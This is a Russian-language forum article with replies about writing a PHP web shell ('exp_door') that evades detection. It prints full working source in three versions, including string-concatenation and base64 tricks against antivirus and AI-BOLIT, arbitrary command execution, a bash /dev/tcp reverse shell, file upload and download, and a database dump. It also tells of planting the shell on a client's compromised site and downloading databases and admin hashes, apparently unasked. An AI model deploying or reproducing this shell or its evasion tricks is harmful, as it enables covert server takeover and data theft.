Статья Создаём беспалевный web-shell и испытываем в боевых условиях

Предисловие.

В один прекрасный день мне вдруг захотелось написать свой web-shell. Зачем же изобретать велосипед? В сети есть множество известных бэкдоров типа WSO, C99, r57, и без проблем можно скачать любой понравившийся. Дело в том, что я потратил достаточно времени на изучение мини-шеллов, и конечно не обошёл вниманием и полноценные бэкдоры.

Так вот практика показала, что немалая часть из них имеют на борту стучалки/звонилки, и прочие нехорошие внедрения. Бывают они и на самом видном месте, даже видел с комментарием – вы можете удалить это, или поменять адрес на свой )))

Как правило такие шеллы занимают приличный объём 1000-2000 строк кода на PHP+JS. Если вы конечно хорошо владеете этими языками программирования, и готовы потратить время на построчное изучение кода, дабы не попасть впросак, то всё отлично. Можно всё перелопатить, деобфусцировать отдельные участки кода, удалить заразу, если таковая нашлась и наслаждаться.

Правда в погоне за функционалом, встречается и избыточность, например в b374k куча вкладок из того что есть в phpinfo. Также большая часть веб-шеллов написана в 2004-2006 годах, и имеют устаревшие или нерабочие фичи. Ну и существенный минус то, что большинство из них легко распознаются антивирусами и программами для поиска бэкдоров.

bk.png


В итоге я прикинул какой полезный минимум я хотел бы увидеть, и принялся за дело. Сказать конечно легко, а сделать труднее, ведь я совсем не знаю PHP ))) Обрывочные знания на уровне подключения к базам данных, и мини-шеллов были моей стартовой площадкой.

На самом деле при создании веб-шелла мне очень круто пригодились навыки веб-программирования, ведь HTML+CSS я знаю прекрасно. А также помог Python. При чём тут питон скажете вы, и будете неправы. Зная хоть один язык программирования, разобраться с другими языками в разы легче.

Если пересесть из жигулей в иномарку, то учиться совсем заново не потребуется. Будет немного непривычно, кнопочки и прочие штучки в других местах, расстояние до педалей, рычага переключения передач, и другие отличия налицо. Но зная общий принцип управления авто, вы сможете ехать.

Вот и я, вооружившись манами, форумами, примерами кодов, начал потихоньку пилить свою первую программу на PHP. И знаете, получилось всё что я задумал, и даже немного больше.

Обзор функционала.

По сути, кроме командной строки для успешного выполнения задач по исследованию ресурса и не требуется. Но некоторый автоматизм создаёт более комфортные условия для работы.

Общий вид программы

door.png


Зоркий глаз в фавиконке всё видит ) В шапке мы получаем полезную информацию, которая выводится сразу при открытии веб-шелла. А именно мы видим пользователя, под которым находимся, путь к текущему каталогу, где расположен шелл, справочную информацию об ОС сервера, путь и права на временную папку, версию php, адрес и IP хоста, а также версию сервера.

Прекрасно, это избавит нас от ряда запросов. В следующем разделе самое главное – поле для ввода команд. По соседству кнопки для вывода phpinfo, своего IP, под которым мы зашли, и списка доступных загрузчиков, типа wget, curl и т.д.

php.png


Ряд ниже начинается с самых часто используемых кодировщиков полезных нагрузок. Рядом backconnect, ну куда же без него, и в конце ряда загрузчик файлов с обзором на машине атакующего. Завершает всё это дело вкусняшка, делающая дамп базы данных (только Mysql и MariaDB).

Для большинства задач этого функционала вполне достаточно. Впрочем, это ведь первая версия, и ничто не мешает сделать дальнейший апгрейд.

Проверяем на палевность.

Нисколько не сомневаюсь, что мой шелл будет отправлен добрыми самаритянами на Virustotal после публикации. Поэтому сделал это сам ) Первый заброс показал один детект.

total.png


Ну что же, немного покумекав, и на всякий случай, переименовав с post.php на posts.php закинул ещё раз.

total2.png


Неплохо! Но стоит заметить, что антивирусы не заточены под бэкдоры, поэтому я решил уже прогнать прогу через тяжёлую артиллерию. Порыскав в интернете, я нашёл несколько онлайн-сканеров, проверяющих сайты на вирусы. Закинув бэкдор на свой ресурс протестировал, на всех сканерах одна картина.

ot4et.png


Хорошо, сам онлайн-сканер предлагает нам воспользоваться программой AI-BOLIT. На сегодняшний день она считается наиболее эффективной для поиска шеллов, и используется большинством хостеров для оказания услуги проверок на вредоносный код.

Загрузил это чудо, прочитал инструкцию. Выяснил что имеется 2 режима проверки – обычный и пароноидальный. Конечно проверять по максимуму, отправил запрос php ai-bolit-hoster.php --mode=2 -jpost.php

При первом проходе айболиту код не понравился, но мы не привыкли отступать, нам обмануть его поможет киножурнал хочу всё знать небольшие правки кода. По второму кругу получили нужный результат.

aib.png


Попытался найти ещё что-то более крутое чем айболит, но не смог. Если у вас есть сканер, который даст детект на мой шелл, скиньте ссылочку, устраню неполадку )))
На самом деле, чтобы было совсем круто, нужно убрать все упоминания base64 и POST, иначе можно просто легко отгрепать по ключевикам вручную.

В ходе испытаний я выяснил, что чем круче обфускация, тем легче детектится шелл. Для человека код представляется непонятной белибердой, но антивири начинают верещать. На самом деле здесь просто вступает в силу эвристический анализ сигнатур, и встретив в коде конструкции типа $___.=$__; сканер начинает показывать своё недовольство.

По этой причине я обошёл сканеры всего лишь приёмом конкатенации, что и дало нужный результат.

А зачем вообще пентестеру вэб-шелл, да ещё чтобы не детектился? Да всякие случаи бывают, например наивный заказчик не делал бэкапов, или делал но хранил их прямо на ресурсе.

Disclaimer: не будьте ламерами, и никогда так не делайте! Хранить бэкапы в ресурсах сайта нельзя!!!

В результате компрометации, хакер, изменив пароли получает полный контроль, и одним из немногих вариантов остаётся найти дыру в сайте, и проделать путь хакера, установив свой шелл. Далее уже действовать по обстоятельствам – наблюдать, копировать файлы, если права позволят и т.д.

В недрах кода.

Заглянем, что находится под капотом. Поскольку у нас web-shell, или шелл с так называемой веб-мордой, то начинать нужно с каркаса HTML, сделав конструкцию вида:

HTML:
<!DOCTYPE html>
<html>
<head>
<title> </title>
</head>
<body>
</body>
</html>

Между тегов body будут располагаться формы для post-запросов и php-код, впрочем его можно выносить частично и за пределы html, в самом начале. Так, например, нужно поступить в случае, если мы делаем доступ с авторизацией к шеллу с использованием cookie.

Кстати об авторизации – у меня она написана, но посмотрев на количество кода, я решил её не внедрять в шелл. Кому надо, может поставить, но не рекомендую использовать WWW-Authenticate Basic. Дело в том, что этот вариант сработает не на всех серверах, так как требуется настройка. Если PHP подключен как CGI, то вбив валидную пару лог/пасс получите от ворот поворот )

В начале кода, пара длинных строк это иконки в формате base64, что позволяет их внедрять в код, а не хранить в отдельных файлах. Также немного стилей для нужного отображения элементов. А вот и вся магия, позволившая обойти детекты

PHP:
$a1='pas'.'sth'.'ru';
$b2='ex'.'ec';

В PHP конкатенация строк делается через точку, переменные склеиваются, и при этом сканер не может распознать ключевые слова типа passthru, exec, system… А вот как выглядит полный приём обхода.

PHP:
$id="id";
echo $a1($id);

Эта конструкция будет эквивалентна коду passthru(id); Другая информация в шапке программы идёт без ухищрений. В переменные записываем тот или иной интересующий вызов.

PHP:
$pwd=__DIR__;
$uname=php_uname();
$php=phpversion();
$temp_file=sys_get_temp_dir();
$down="which get;which wget;which lynx;which curl;which fetch;which links;";

И выводим всё с помощью echo.

PHP:
echo '<pre>';
echo 'id    | ';
echo $a1($id);
echo 'pwd   | '.$pwd.'<br>';
echo 'uname | '.$uname.'<br>';
echo 'tmp   | '.$temp_file.' '.substr(sprintf('%o', fileperms($temp_file)), -4).'<br>';
echo 'php   | '.$php.'<br>';
echo 'server| '.$_SERVER['SERVER_NAME'].' '.$_SERVER["SERVER_ADDR"].' '.$_SERVER['SERVER_SOFTWARE'];
echo '</pre>';

Самую большую часть кода занимают всевозможные формы отправки и обработчики форм, действующие по принципу – если была нажата кнопка, выполнить такой-то код. Например вывод phpinfo выглядит так:

PHP:
    if(isset($_POST['info']))
    {echo phpinfo();}

Отличие есть только у одной формы для дампа базы. Чтобы никто через плечо не подсматривал что мы вводим, выставляем type="password". В таком виде вместо символов вводимых с клавиатуры видны только чёрные кружочки.

Итоговый код получился небольшой, порядка 160 строк. Так что не будет сложностей в нём разобраться. Получилась хорошая базовая версия, к которой можно прикрутить любые фичи на свой вкус.

Кроме обхода детекта пришлось поправлять код ещё и от палева в логах. Стоило открыть шелл, как сразу сыпались запросы к форме и базе, оставляя следы. Но это было лишь по моей неосмотрительности, немного не так расставил условия.

Кстати о логах – хотите не палиться, пользуйтесь бэкконнектом. Если это не принципиально, то смело можно пользоваться всем функционалом. Хоть все команды идут через post-запросы, в логах можно увидеть месторасположение шелла. И не верьте тому, кто говорит, что post-запросы не оставляют видимых следов. У меня, например сервак показывает абсолютно всё, записывая в отдельный файл и тело запроса, а не только расположение файла.

post.png


Конечно хотелось обкатать бэкдор в деле, и такой случай мне предоставился.

История одного взлома.

Разбирая старые письма, я наткнулся на такой экземпляр.

333.png


Это было письмо 1.5 летней давности, на которое я ответил, что хакеры пытаются сайт взломать. Я продвигал тогда заказчику несколько сайтов, но формы отправки не стал смотреть. Во-первых это не относилось к моей работе, и во-вторых я в htaccess установил директивы от поползновений типа XSS.

Но сейчас увидев письмо, я подумал – надо проверить. Посмотрел NS и увидел, что сайты на днях переехали на другой хостинг. А до этого у него одним из сайтов как минимум занимался дизайнер, обновлял внешний вид. Хостинг один из самых известных в России, но у него есть существенный недостаток, о котором вы узнаете позже.

В общем что-то меня сподвигло на проверку, и я стал фаззить самый главный сайт из 6 имеющихся у владельца. Запустил WFUZZ на предмет файлов php, справедливо полагая, что если есть вредонос, то с большей долей вероятности он будет именно на php.

proxychains4 wfuzz -c -u " " -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 178

И вот предо мной уже результаты, насторожила эта строка.

el.png


Ничего необычного не замечаете??? Обычно файл readme имеет расширение txt, а здесь php. Если предположить, что это шелл, то можно попробовать угадать вызов команд. Начну с GET, отправляю в браузере

readme.php?c=whoami - мимо
readme.php?a=system&b=whoami - опять не то
readme.php?cmd=whoami - сработало!

ww.png


А взломщик вообще не парился как я посмотрю, прямо в корне шелл, на самом видном месте полёживает.

readme.php?cmd=ls –la

ls.png


Судя по дате (если она не сменена), взлом произошёл 11 месяцев назад, более того файл имеет права root. А значит, что большая вероятность утечки паролей. Настала пора проверить свою разработку. Смотрю какие есть качалочки на сервере.

wget.png


Копирую свой web-backdoor в дальний уголок, и далее работаю уже в интерфейсе.

cmd.png


la.png


А вот и то о чём я говорил – у данного хостера все яйца сайты лежат в одной корзинке. Это полное фиаско для владельца сайтов. Имея уязвимость в одном из них, все остальные оказываются в доступе, а их всего шесть. У предыдущего хостера такого безобразия не было. Как я позже узнал, причиной переезда ресурсов была банальная экономия – этот хостинг стоил дешевле.

Не гонитесь за дешевизной! Об этом ещё Балда предупреждал.

balda.png


Идём дальше:

/var/www/site/html/

pol.png


Ох уж эти админы, посмотрите – бэкапы лежат на хостинге, более того, некоторые из них разбросаны по директориям в нескольких экземплярах. И я беспрепятственно могу скачивать эти архивы. Так чуток побыстрее будет проверить наличие архивов.
find / -name "*.zip"

Хех! 4 сайта из 6 имеют архивы. Ну теперь осталось заглянуть в конфиги. Один из сайтов на MODX, заглянем-ка мы сюда
ls -la /var/www/site/html/core/config/

conf.png


Файл конфига config.inc.php на месте, но прав не хватает. Не проблема – скачиваю архив и открываю заветный файлик.

mod.png


Бинго!!! Юзер базы root, теперь я могу лазить сразу по всем базам беспрепятственно через бэкконнект.

bazka.png


Админ совсем не алё, кроме root других пользователей у сайтов нет.

bazka2.png


А можно просто сразу завладеть БД. Вбиваю данные, жму кнопку. Всё, база скачалась в директорию с шеллом.

bd.png


Теперь просто вбиваю адрес в браузере и скачиваю на свою машину базку. Расширение zip переименовываю в sql и можно работать либо в mysql-менеджере, либо просто открыть в notepad++. А вот и админ с хэшем пароля от админки.

xesh.png


Полный разгром, скачал 2 базы, остальные 4 сайта баз не имеют. Беру телефон, набираю владельца ресурсов. Разговор длился около 20 минут, в котором я рассказал, что сайты взломаны, что можно скачивать любую инфу, включая базы данных. Злоумышленник может вставлять на страницы сайта вредоносный код и ещё куча разных всяко-разного.

На вопрос что делать, сказал что есть 3 варианта:

1. Обратиться к хостеру. Обычно за 2-3к рублей они просто прогоняют сайт айболитом, и прочими сканерами, но это недостаточно эффективно, так как не все зловреды могут быть обнаружены.

2. Найти безопасника, который не только прогами, но и вручную сможет прочекать сайты. Кроме прочего найдёт дыру, и подскажет как закрыть, или даже сам это сделает. Будет подороже, но это того стоит.

3. Могу проверить сайты я, так как имею 2 сертификата по тестированию на проникновение, и много лет работаю с web.

Владелец сайтов сказал спасибо, и ушёл переваривать информацию. Прошло несколько дней, но воз и ныне там, сайтами никто не занимался. Видимо владелец не отдаёт себе полного отчёта, чем это чревато. Эту статью ему что-ли дать почитать )))

Так что надеюсь, после прочтения данной статьи, форумчане, имеющие сайты извлекут для себя некоторые уроки.
Берегите свои ресурсы, пользуйтесь надёжными хостингами, и не повторяйте чужих ошибок!

PHP:
<!DOCTYPE html>
<html style="background-color: #D3D3D3;">
    <head>
        <title>exp_door</title>
<link href="" rel="icon" type="image/png" />
<style>
hr {
border:1px !important;height: 1px;width:100% !important;background-color:#7d7171 !important;color:#7d7171 !important;
}
body {font-family: sans-serif !important;color:black !important;}
pre {margin: 0;}
</style>
    </head>
<body style="background-color: #D3D3D3;">

<img style="float:right" src="" />

<?php
$a1='pas'.'sth'.'ru';
$b2='ex'.'ec';
$id="id";
$pwd=__DIR__;
$uname=php_uname();
$php=phpversion();
$temp_file=sys_get_temp_dir();
$down="which get;which wget;which lynx;which curl;which fetch;which links;";


echo '<pre>';
echo 'id    | ';
echo $a1($id);
echo 'pwd   | '.$pwd.'<br>';
echo 'uname | '.$uname.'<br>';
echo 'tmp   | '.$temp_file.' '.substr(sprintf('%o', fileperms($temp_file)), -4).'<br>';
echo 'php   | '.$php.'<br>';
echo 'server| '.$_SERVER['SERVER_NAME'].' '.$_SERVER["SERVER_ADDR"].' '.$_SERVER['SERVER_SOFTWARE'];
echo '</pre>';
?>
<pre><p style="float:right;margin-block-end:3px;">exp_door v1.0</p></pre>
<hr>
<form style="display:inline" method="POST">
  cmd: <input type=text name=cmd>
</form>

<form style="display:inline" method="POST">
    <input type="submit" name="info" value="phpinfo"/>
    <input type="submit" name="ip" value="my ip"/>
    <input type="submit" name="down" value="downloaders"/>
</form>

<hr>

<div style="float: left;display:block;width:208px">
<pre>
<form method='POST'>
 <label><b>Base64 encode/decode:</b></label>
 <input style="width:178px" type=text name='base64'>
 <input type='submit' name='submit' value='Encode'><input type='submit' name='submit2' value='Decode'>
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
 <label><b>URL encode/decode:</b></label>
 <input style="width:178px" type='text' name='url'>
 <input type='submit' name='submit_u' value='Encode'><input type='submit' name='submit_u2' value='Decode'>  
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
 <label><b>BackConnect to 4444:</b></label>  
 <input style="width:178px" type="text" name="host_" placeholder="Enter host" required>
 <input type="submit" name="reverse" value="reverse">
</form>
</pre>
</div>

<div style="float: left;display:block">
<pre>
<form method="POST" enctype='multipart/form-data'>
 <label><b>Uploader:</b></label>
 <input type='file' name='filename' ><br/>
 <input type='submit' value='Upload'>
</form>
<pre>
</div>

<hr style="clear:both">
<form style="float:left;margin-right:20px;"method="POST">

    <p><input type="password" name="name" placeholder="DB name" required></p>
        <p><input type="password" name="user" placeholder="DB user" required></p>
        <p><input type="password" name="pass" placeholder="DB pass" required></p>  
        <p><input type="password" name="host" placeholder="MySQL host" required></p>
    <p><button type="submit" name="DB">Save DB to file.zip</button></p>  
</form>


<?php
if ($_FILES && $_FILES['filename']['error']== UPLOAD_ERR_OK)
{
    $name = $_FILES['filename']['name'];
    move_uploaded_file($_FILES['filename']['tmp_name'], $name);
    echo '<p style="color: red">'.'File Uploaded'.'</p>'; ;
}

    if(isset($_POST['info']))
    {echo phpinfo();}
    if(isset($_POST['ip']))
    {print $_SERVER['REMOTE_ADDR'];}
    if(isset($_POST['down']))
    {
echo '<pre>';
echo $a1($down);
echo '</pre>';
}

    if (isset($_POST['submit'])) {
    $base64 = $_POST['base64'];
    $encode = base64_encode($base64);
echo '<p style="color: red">'."Encode base64: ".'</p>'.$encode;
}
    if (isset($_POST['submit2'])) {
    $base64_d = $_POST['base64'];
    $decode = base64_decode($base64_d);
echo '<p style="color: red">'."Decode base64: ".'</p>'.htmlentities($decode);
}

if (isset($_POST['submit_u'])) {
  $url = $_POST['url'];
  $encode_u = urlencode($url);
  echo '<p style="color: red">'."Encode url: ".'</p>'.$encode_u;
}
if (isset($_POST['submit_u2'])) {
  $url_d = $_POST['url'];
  $decode_u = urldecode($url_d);
  echo '<p style="color: red">'."Decode url: ".'</p>'.htmlentities($decode_u);
}

if (isset($_POST['reverse'])) {  
   $back = $_POST['host_'];
   $a1("bash -c 'bash -i &> /dev/tcp/$back/4444 0>&1'");
 
}
?>

<pre>
<div style="float:left;margin-bottom:20px">
<?php
if(isset($_POST['cmd'])){
$a1($_POST['cmd']);
}
?>
</div>
</pre>

<?php

if(isset($_POST['DB'])){
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$name = $_POST['name'];
$link = new mysqli($host, $user, $pass, $name);

if ($link->connect_error) {
    die("<b>Database access is not available:</b><br>".$link->connect_error);
}else
    {$b2('mysqldump --user='.$user.' --password='.$pass.' --host='.$host.' '.$name.' > file.zip');echo 'Database access<br>';}
}
?>

</body>
</html>
 
Последнее редактирование модератором:
Хорошая статья, хотелось бы еще почитать о том как чистят веб-шеллы. Не прибегая, к созданию своего.
 
  • Нравится
Реакции: neoline.kmv
Хорошая статья, хотелось бы еще почитать о том как чистят веб-шеллы. Не прибегая, к созданию своего.
По чистке шеллов схема примерно следующая:
1. Быстрый анализ сканерами
2. Запросы вручную
3. В заключение поиск дыры, и её закрытие, иначе весь труд будет напрасен.
4. Создание бэкапа сайта и базы после чистки.

Пункт 2 самый интересный, по нему действительно получится целая статья. Запросов много, так как злоумышленники довольно хитры. Большие веб-шеллы обнаружить проще из-за развёрнутого функционала, есть за что зацепиться. Мини-шелл же можно сделать реально невидимкой, в логах не будет никаких запросов, и в теле шелла сложно найти аномалию. Поэтому выявить подобное очень непросто.

Я вас услышал, взял просьбу на заметку.
 
Спасибо, ТС! Хорошая информация для размышления на праздники. До этого как-то особо и не задумывался о дырах на сайте...
 
Немного подредактировал программу, добавил Downloader для скачивания файлов с сервера.

ro.png


Для успешного скачивания нужно ввести полный путь и название файла. Если нужные файлы находятся в директории с шеллом, тогда путь вводить не обязательно. Также у файла должны быть права на чтение. Если название с путями введены верно, то появится диалоговое окно браузера, иначе ничего не произойдёт. И не забудьте в диалоговом окне поменять Open на Save.

root.png


PHP:
<?php

if(isset($_POST['downl'])){
$file = $_POST['files'];
  if (file_exists($file)) {
      if (ob_get_level()) {
      ob_end_clean();
    }  
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=' . basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));  
    readfile($file);
    exit;
  }
}
?>
<!DOCTYPE html>
<html style="background-color: #D3D3D3;">
    <head>
        <title>exp_door</title>
<link href="" rel="icon" type="image/png" />
<style>
hr {
border:1px !important;height: 1px;width:100% !important;background-color:#7d7171 !important;color:#7d7171 !important;
}
body {font-family: sans-serif !important;color:black !important;}
pre {margin: 0;}
</style>
    </head>
<body style="background-color: #D3D3D3;">

<img style="float:right" src="" />

<?php
$a1='pas'.'sth'.'ru';
$b2='ex'.'ec';
$id="id";
$pwd=__DIR__;
$uname=php_uname();
$php=phpversion();
$temp_file=sys_get_temp_dir();
$down="which get;which wget;which lynx;which curl;which fetch;which links;";

echo '<pre>';
echo 'id    | ';
echo $a1($id);
echo 'pwd   | '.$pwd.'<br>';
echo 'uname | '.$uname.'<br>';
echo 'tmp   | '.$temp_file.' '.substr(sprintf('%o', fileperms($temp_file)), -4).'<br>';
echo 'php   | '.$php.'<br>';
echo 'server| '.$_SERVER['SERVER_NAME'].' '.$_SERVER["SERVER_ADDR"].' '.$_SERVER['SERVER_SOFTWARE'];
echo '</pre>';
?>
<pre><p style="float:right;margin-block-end:3px;">exp_door v1.0.1</p></pre>
<hr>
<form style="display:inline" method="POST">
  cmd: <input type=text name=cmd>
</form>

<form style="display:inline" method="POST">
    <input type="submit" name="info" value="phpinfo"/>
    <input type="submit" name="ip" value="my ip"/>
    <input type="submit" name="down" value="downloaders"/>
</form>

<hr>

<div style="float: left;display:block;width:208px">
<pre>
<form method='POST'>
<label><b>Base64 encode/decode:</b></label>
<input style="width:178px" type=text name='base64'>
<input type='submit' name='submit' value='Encode'><input type='submit' name='submit2' value='Decode'>
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
<label><b>URL encode/decode:</b></label>
<input style="width:178px" type='text' name='url'>
<input type='submit' name='submit_u' value='Encode'><input type='submit' name='submit_u2' value='Decode'>  
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
<label><b>BackConnect to 4444:</b></label>  
<input style="width:178px" type="text" name="host_" placeholder="Enter host" required>
<input type="submit" name="reverse" value="reverse">
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
<label><b>Downloader:</b></label>  
<input style="width:178px" type="text" name="files" placeholder="Enter patch/file" required>
<input type="submit" name="downl" value="Download">
</form>
</pre>
</div>

<div style="float: left;display:block">
<pre>
<form method="POST" enctype='multipart/form-data'>
<label><b>Uploader:</b></label>
<input type='file' name='filename' ><br/>
<input type='submit' value='Upload'>
</form>
<pre>
</div>

<hr style="clear:both">
<form style="float:left;margin-right:20px;"method="POST">
<input type="password" name="name" placeholder="DB name" required><br/>
<input type="password" name="user" placeholder="DB user" required><br/>
<input type="password" name="pass" placeholder="DB pass" required><br/>
<input type="password" name="host" placeholder="MySQL host" required><br/>
<button type="submit" name="DB">Save DB to file.zip</button></p>  
</form>
<?php

if ($_FILES && $_FILES['filename']['error']== UPLOAD_ERR_OK)
{
    $name = $_FILES['filename']['name'];
    move_uploaded_file($_FILES['filename']['tmp_name'], $name);
    echo '<p style="color: red">'.'File Uploaded'.'</p>';
}

    if(isset($_POST['info']))
    {echo phpinfo();}
    if(isset($_POST['ip']))
    {print $_SERVER['REMOTE_ADDR'];}
    if(isset($_POST['down']))
    {
echo '<pre>';
echo $a1($down);
echo '</pre>';
}

    if (isset($_POST['submit'])) {
    $base64 = $_POST['base64'];
    $encode = base64_encode($base64);
echo '<p style="color: red">'."Encode base64: ".'</p>'.$encode;
}
    if (isset($_POST['submit2'])) {
    $base64_d = $_POST['base64'];
    $decode = base64_decode($base64_d);
echo '<p style="color: red">'."Decode base64: ".'</p>'.htmlentities($decode);
}

if (isset($_POST['submit_u'])) {
  $url = $_POST['url'];
  $encode_u = urlencode($url);
  echo '<p style="color: red">'."Encode url: ".'</p>'.$encode_u;
}
if (isset($_POST['submit_u2'])) {
  $url_d = $_POST['url'];
  $decode_u = urldecode($url_d);
  echo '<p style="color: red">'."Decode url: ".'</p>'.htmlentities($decode_u);
}

if (isset($_POST['reverse'])) {  
   $back = $_POST['host_'];
   $a1("bash -c 'bash -i &> /dev/tcp/$back/4444 0>&1'");
 
}
?>

<pre>
<div style="float:left;margin-bottom:20px">
<?php
if(isset($_POST['cmd'])){
$a1($_POST['cmd']);
}
?>
</div>
</pre>


<?php

if(isset($_POST['DB'])){
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$name = $_POST['name'];
$link = new mysqli($host, $user, $pass, $name);

if ($link->connect_error) {
    die("<b>Database access is not available:</b><br>".$link->connect_error);exit();
}else
    {$b2('mysqldump --user='.$user.' --password='.$pass.' --host='.$host.' '.$name.' > file.zip');echo 'Database access<br>';}
}
?>

</body>
</html>
 
Интересная статья,спасибо. А как вообще ставят майнеры через шеллы на сервера?
 
Интересная статья,спасибо. А как вообще ставят майнеры через шеллы на сервера?
Майнеры ставят точно также как и без шелла - в первую очередь его нужно закачать в директорию, где есть на это права ) Права должны быть и на исполнение в том числе. И не рекомендую этим заниматься. С одного сайта будет 3-5 рублей в сутки, а значит необходим ботнет машин на 1000, чтобы получилось что-то вменяемое на выходе. Да и нужно хорошо кодить для начала. Управление большой группой ботов может привести к наручникам за спиной.
 
  • Нравится
Реакции: SlipX, Droid и Gunn1110
Небольшое обновление:

* Небольшое цветовое изменение в дизайне
* Убрал аватар
* Сделал чуток компактнее
* Для
Downloader сделал вывод ошибки. Например набрав левый файл 123, получаем сообщение

file.png


* Использование функций base64_encoder и base64_decoder скрыл через конкатенацию
* Добавлена полезная фишка - показ потенциально опасных функций включенных на ресурсе, выводится в массиве при нажатии на кнопку
functions

ex.png


Внешний вид шелла:

proga.png


PHP:
<!DOCTYPE html>
<html style="background-color: #D3D3D3;">
<head>
<title>exp_door v1.0.2</title>
<link href="" rel="icon" type="image/png" />

<style type="text/css">
b {
color:#008800;
font-style:bold;}
hr {border:1px !important;height: 1px;background-color:#7d7171 !important;color:#7d7171 !important;}
body {font-family: sans-serif !important;color:black !important;}
pre {margin: 0;}
//input[type=file]{color: transparent;}
</style>
</head>
<body style="background-color: #D3D3D3;">


<?php
$a1='pas'.'sth'.'ru';
$b2='ex'.'ec';
$aTwo = "ba"."se"."6"."4"."_"."en"."co"."de";
$bTwo = "ba"."se"."6"."4"."_"."de"."co"."de";
$id="id";
$pwd=__DIR__;
$uname=php_uname();
$php=phpversion();
$temp_file=sys_get_temp_dir();
$down="which get;which wget;which lynx;which curl;which fetch;which links;";
$fun=$bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");

echo '<pre>';
echo 'id    | ';
echo $a1($id);
echo 'pwd   | '.$pwd.'<br>';
echo 'uname | '.$uname.'<br>';
echo 'tmp   | '.$temp_file.' '.substr(sprintf('%o', fileperms($temp_file)), -4).'<br>';
echo 'php   | '.$php.'<br>';
echo 'server| '.$_SERVER['SERVER_NAME'].' '.$_SERVER["SERVER_ADDR"].' '.$_SERVER['SERVER_SOFTWARE'];
echo '</pre>';
?>

<hr>
<form style="float:left;margin-right:20px;"method="POST">
<input type="password" name="name" placeholder="DB name" required><br/>
<input type="password" name="user" placeholder="DB user" required><br/>
<input type="password" name="pass" placeholder="DB pass" required><br/> 
<input type="password" name="host" placeholder="MySQL host" required><br/>
<button type="submit" name="DB">Save DB to file.zip</button></p>   
</form>

<form style="display:inline" method="POST">
<input type=text name=cmd placeholder="CMD">
</form>

<form style="display:inline" method="POST">
    <input type="submit" name="info" value="phpinfo"/>
    <input type="submit" name="ip" value="my ip"/>
    <input type="submit" name="down" value="downloaders"/>
    <input type="submit" name="fun" value="functions"/>
</form>


<hr>

<div style="float: left;display:block;width:208color: transparent;px">
<pre>
<form method='POST'>
 <label><b>Base64 encode/decode:</b></label>
 <input style="width:178px" type=text name='base64'> 
 <input type='submit' name='submit' value='Encode'><input type='submit' name='submit2' value='Decode'>
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
 <label><b>URL encode/decode:</b></label>
 <input style="width:178px" type='text' name='url'>
 <input type='submit' name='submit_u' value='Encode'><input type='submit' name='submit_u2' value='Decode'>   
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
 <label><b>BackConnect to 4444:</b></label>   
 <input style="width:178px" type="text" name="host_" placeholder="Enter host" required>
 <input type="submit" name="reverse" value="reverse">
</form>
</pre>
</div>

<div style="float: left;display:block;width:208px">
<pre>
<form  method='POST'>
 <label><b>Downloader:</b></label>   
 <input style="width:178px" type="text" name="files" placeholder="Enter patch/file" required>
 <input type="submit" name="downl" value="Download">
</form>
</pre>
</div>

<div style="float: left;display:block">
<pre>
<form method="POST" enctype='multipart/form-data'>
 <label><b>Uploader:</b></label>
 <input type='file' name='filename' ><br/>
 <input type='submit' value='Upload'>
</form>
<pre>
</div>

<hr style="clear:both">


<?php
if ($_FILES && $_FILES['filename']['error']== UPLOAD_ERR_OK)
{
    $name = $_FILES['filename']['name'];
    move_uploaded_file($_FILES['filename']['tmp_name'], $name);
    echo '<p style="color: red">'.'File Uploaded'.'</p>';
}

    if(isset($_POST['info']))
    {echo phpinfo();}
    if(isset($_POST['ip']))
    {print $_SERVER['REMOTE_ADDR'];}
    if(isset($_POST['down']))
    {
echo '<pre>';
echo $a1($down);
echo '</pre>';
}
    if(isset($_POST['fun']))
    {
    echo '<pre>';
    echo $a1($fun);
    echo '</pre>';
}

    if (isset($_POST['submit'])) {
    $base64 = $_POST['base64'];
    $encode = $aTwo($base64);
echo '<p style="color: red">'."Encode base64: ".'</p>'.$encode;
}
    if (isset($_POST['submit2'])) {
    $base64_d = $_POST['base64'];
    $decode = $bTwo($base64_d);
echo '<p style="color: red">'."Decode base64: ".'</p>'.htmlentities($decode);
}

if (isset($_POST['submit_u'])) {
  $url = $_POST['url'];
  $encode_u = urlencode($url);
  echo '<p style="color: red">'."Encode url: ".'</p>'.$encode_u;
}
if (isset($_POST['submit_u2'])) {
  $url_d = $_POST['url'];
  $decode_u = urldecode($url_d);
  echo '<p style="color: red">'."Decode url: ".'</p>'.htmlentities($decode_u);
}

if (isset($_POST['reverse'])) {   
   $back = $_POST['host_'];
   $a1("bash -c 'bash -i &> /dev/tcp/$back/4444 0>&1'");
  
}
?>

<pre>
<div style="float:left;margin-bottom:20px">
<?php
if(isset($_POST['cmd'])){
$a1($_POST['cmd']);
}
?>
</div>
</pre>


<?php

if(isset($_POST['DB'])){
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$name = $_POST['name'];
$link = new mysqli($host, $user, $pass, $name);

if ($link->connect_error) {
    die("<b>Database access is not available:</b><br>".$link->connect_error);exit();
}else
